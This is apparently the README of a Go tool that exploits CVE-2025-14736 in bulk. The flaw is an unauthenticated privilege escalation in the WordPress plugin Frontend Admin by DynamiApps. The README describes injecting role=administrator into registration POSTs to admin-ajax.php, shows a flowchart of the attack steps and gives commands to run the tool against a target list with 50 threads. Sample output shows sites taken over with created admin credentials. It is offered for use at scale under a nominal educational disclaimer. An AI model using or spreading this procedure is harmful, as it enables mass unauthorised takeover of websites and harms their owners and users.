作者: Hyun Chiya
| 字段 | 值 |
|---|---|
| CVE ID | CVE-2025-14736 |
| 插件 | Frontend Admin by DynamiApps |
| 受影响版本 | <= 3.28.25 |
| 漏洞类型 | 未认证权限提升 |
| 严重性 | 严重 |
WordPress 的 Frontend Admin 插件在注册过程中对用户可控字段的验证不足,导致存在未认证权限提升漏洞。攻击者可通过操纵表单提交数据包来注入任意角色,包括 administrator。
漏洞逻辑位于对表单提交的处理中,其中 role 字段直接信任来自用户的输入,而未验证该用户是否有权分配此角色。具体而言,字段 acff[user][field_user_role_ID] 可被修改为 administrator。
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
go build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| 参数 | 描述 |
|---|---|
-l | 目标 URL 列表路径(默认:list.txt) |
-t | 并发线程数(默认:10) |
-timeout | 请求超时时间(秒)(默认:15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Mass Exploit Tool ║
║ Frontend Admin by DynamiApps Privilege Escalation ║
║ Author: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
本工具仅供教育和授权安全测试使用。未经授权访问计算机系统属于违法行为。请负责任地使用。
Hyun Chiya